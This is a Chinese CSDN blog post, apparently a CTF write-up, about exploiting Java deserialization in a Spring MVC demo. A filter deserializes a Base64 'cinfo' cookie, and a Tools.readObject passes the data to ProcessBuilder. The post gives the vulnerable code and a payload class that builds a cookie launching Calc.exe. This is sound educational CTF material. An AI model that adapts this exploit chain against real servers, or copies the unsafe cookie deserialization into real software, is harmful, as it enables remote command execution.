JavaCTF记录

最新推荐文章于 2024-05-20 10:24:40 发布
最新推荐文章于 2024-05-20 10:24:40 发布
阅读量113 收藏
点赞数
文章标签: java 前端 服务器 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/132972325
版权

Springmvcdemo

在没有提升权限之前,整个环境只有Cookie是可控的,并且提升权限也是要通过cookie来,先看看它对cookie做了什么,看一下过滤器

public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    Cookie[] cookies = ((HttpServletRequest)request).getCookies();
    boolean exist = false;
    Cookie cookie = null;
    if (cookies != null) {
        Cookie[] var7 = cookies;
        int var8 = cookies.length;

        for(int var9 = 0; var9 < var8; ++var9) {
            Cookie c = var7[var9];
            if (c.getName().equals("cinfo")) {
                exist = true;
                cookie = c;
                break;
            }
        }
    }

    byte[] bytes;
    if (exist) {
        String b64 = cookie.getValue();
        Decoder decoder = Base64.getDecoder();
        bytes = decoder.decode(b64);
        ClientInfo cinfo = null;
        if (!b64.equals("") && bytes != null) {
            try {
                cinfo = (ClientInfo)Tools.parse(bytes);
            } catch (Exception var14) {
                var14.printStackTrace();
            }
        }
        ...

发现过滤器对cookie的处理调用了一个Tools类,再看看Tools类

package com.tools;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;
    private String testCall;

    public Tools() {
    }

    public static Object parse(byte[] bytes) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        return ois.readObject();
    }

    public static byte[] create(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(bos);
        outputStream.writeObject(obj);
        return bos.toByteArray();
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        Object obj = in.readObject();
        (new ProcessBuilder((String[])((String[])obj))).start();
    }
}

这个Tools类的readObject,有一个很明显的命令执行。

那么目的就很明显了,需要去触发这个readObject,也就是说需要反序列化一个Tools类

再看Tools的parse方法有一个很明显的readObject,并且也被过滤器调用了

现在链子已经清晰了。

本地构造一个Tools类

package com.tools;

import java.io.*;

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;

    public static Object parse(byte[] bytes) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        return ois.readObject();
    }
    public String testCall;

    public static byte[] create(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(bos);
        outputStream.writeObject(obj);
        return bos.toByteArray();
    }

    @Serial
    private void writeObject (ObjectOutputStream os) throws IOException {
        os . writeObject(new String[]{"Calc.exe"});
    }

    @Serial
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, IOException {
        Object obj = in.readObject();
        (new ProcessBuilder((String[])obj)).start();
    }
}

Payload

import java.util.Base64;
import com.tools.Tools;

public class Payload {
    public static void main(String[] args) throws Exception {
        Tools load = new Tools();
        byte[] bytes = Tools.create(load);
        Base64.Encoder encoder = Base64.getEncoder();
        System.out.println(encoder.encodeToString(bytes));
    }
}

将得到的数据打印出来修改cookie就成功执行命令了

why811
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql server与java实例_CTF笔记Web第1弹看我如何用多种姿势搞定一个SQL注入点
weixin_39545102的博客
11-04 71
本篇分享知识要点:sqlmap常用参数实例讲解union联合查询手工注入sql-shell 数据库交互常用命令实例讲解
jar包增量更新分析
junlaiyan的专栏
05-16 242
借助jdeps分析出jar包的增量文件
docker中安装jenkins,并在node和cloud上跑通基于源码控制SCM的pipeline
qq_29022265的博客
05-19 797
从安装jenkins到创建jenkins的node和cloud,最后再将scm和FreeStyle两种流水线跑通。
java实现拼图小游戏
monkey108的博客
05-16 607
本文主要提供用java实现的拼图小游戏源代码。
命令执行漏洞(二)
XLbb的博客
05-15 891
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
c【语言】了解指针,爱上指针(1)
yzqy_的博客
05-16 880
在计算机中,数据是存储在内存中的,cpu从内存中读取数据,为了方便读取数据,内存又被划分为了一个个的内存单元,一个内存单元的大小就是一字节,一字节等于8bit位,我们给内存进行编号,这个编号就是地址,在c语言中给这个地址起了个名字。是的,亲爱的读者你肯定发现了,&a、p和pc输出的地址是一样的,但&a+1与p+1输出的地址是一样的00EFF940,一次都跳过了4字节,而pc+1输出的却是00EFF93D,一次只跳过一个字节。但是硬件与硬件之间是相互独立的,这该如何实现数据传输呢?”答案当然是否定的。
java数据结构与算法(验证二叉搜索树)
磐门的博客
05-17 241
节点返回空为ture,节点的值不在对应数据大小范围内返回false。将验证二叉搜索树计算同样可以转换为相同子问题,所以比较适合用递归。node为root的左节点时,max更新为root.val。node为root的右节点时,min更新为root.val。
Kubernetes 审计日志采集与分析最佳实践
观测云的博客
05-17 1013
​Kubernetes 在 1.7 版本中发布了审计(Audit)日志功能,通过审计日志,我们能够非常清晰的知道 K8S 集群到底发生了什么事情。
java导出excel动态加载多sheet多复杂表头
weixin_43931108的博客
05-14 242
java导出excel动态加载多sheet多复杂表头
Android Model引入其他aar包 导致无法打包成aar
qq_27400335的博客
05-16 339
Android Model引入其他aar包 导致无法打包成aar
Solon 的 InjectGather 在 AppContext 里起到了什么作用?
最新发布
Itmastergo的博客
05-20 362
Solon是一款轻量级的Java开发框架,其设计理念简单且易于使用,主要应用于微服务和现代化的Java应用开发。Solon框架的核心目标是提供一个高效且简洁的开发环境,使开发者能够快速构建和部署应用程序。在Solon框架中,AppContext是核心上下文,它管理着整个应用程序的生命周期,包括bean的注册、依赖注入、事件管理等。AppContext是一个应用程序的核心容器,类似于Spring中的。Bean管理:负责注册和管理应用程序中的所有bean。依赖注入:提供自动化的依赖注入机制。事件管理。
SpringBoot事件发布与监听,观察者模式使用
小哇
05-16 213
可以发现,用户注册与信息推送强耦合,用户注册其实到存库成功,就已经算是完成了,后面的信息推送都是额外的操作,甚至信息推送失败报错,还会影响API接口的结果,如果在同一事务,报错信息不捕获,还会导致事务回滚,存库失败。本文记录springboot使用@EventListener监听事件、ApplicationEventPublisher.publishEvent发布事件实现业务解耦。
Java基础——字符串
Kenard的博客
05-17 935
基本数据类型、包装类 转成字符串,调用String类的public String valueOf(int n)可将int型转换为字符串相应的valueOf(byte b)、valueOf(long l)、valueOf(float f)、valueOf(doubled)、valueOf(boolean b)可由参数的相应类型到字符串的转换。下面示例中,s1 和 s2 采用 new String() 的方式新建了两个不同字符串,而 s3 和 s4 是通过 s1.intern() 方法取得一个字符串引用。
初识Spring Cloud
u011627218的专栏
05-20 482
一、介绍。
【C++11】std::async函数介绍及问题梳理
朝花夕拾
05-14 1020
本文介绍了C++标准库中的 std::async 函数,该函数用于启动异步任务,提高程序的并发性能。我们首先讨论了 std::async 的基本用法和参数选项,包括异步执行策略、返回值类型和传递参数的方式。接着,探讨了 std::async 可能存在的一些问题,如异常处理、线程资源管理和潜在的性能影响。最后,提出了一些使用 std::async 时需要注意的关键点,以确保代码的可靠性和性能。
Java的数据类型
yican2580的博客
05-15 559
本章详细讲解了Java中的变量和类型,有一些与C语言有区分,并讲解了字符串和数字如何相互转换。
Java-异常
sgliquangang的专栏
05-20 111
会执行,会在return前执行,这个关键字的逻辑就是这么设计的,只要程序正常执行到了try,那就一定会执行。catch和finally可以省略其一,另一个不能被省略。
mqtt异常导致程序崩溃终止
xiyafei122的博客
05-16 133
原因:myMQTTClient.connect();会一直new client,导致之前的 连接断开,从而导致死循环。1、springboot集成mqtt超级详细步骤。
基于springboot+vue+Mysql的交流互动系统
老卓爱爪哇 的博客
05-15 1041
对于本交流互动系统的设计来说,系统开发主要是采用java语言技术,在整个系统的设计中应用MySQL数据库来完成数据存储,具体根据交流互动系统的现状来进行开发的,具体根据现实的需求来实现交流互动系统网络化的管理,各类信息有序地进行存储,进入交流互动系统页面之后,方可开始操作主控界面,主要功能包括管理员:首页、个人中心、用户管理、帖子分类管理、帖子信息管理、聚会信息管理、报名信息管理、系统管理,用户;首页、个人中心、帖子信息管理、报名信息管理、我的收藏管理,前台首页;首页、帖子信息、聚会信息、个人中心、后台管理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值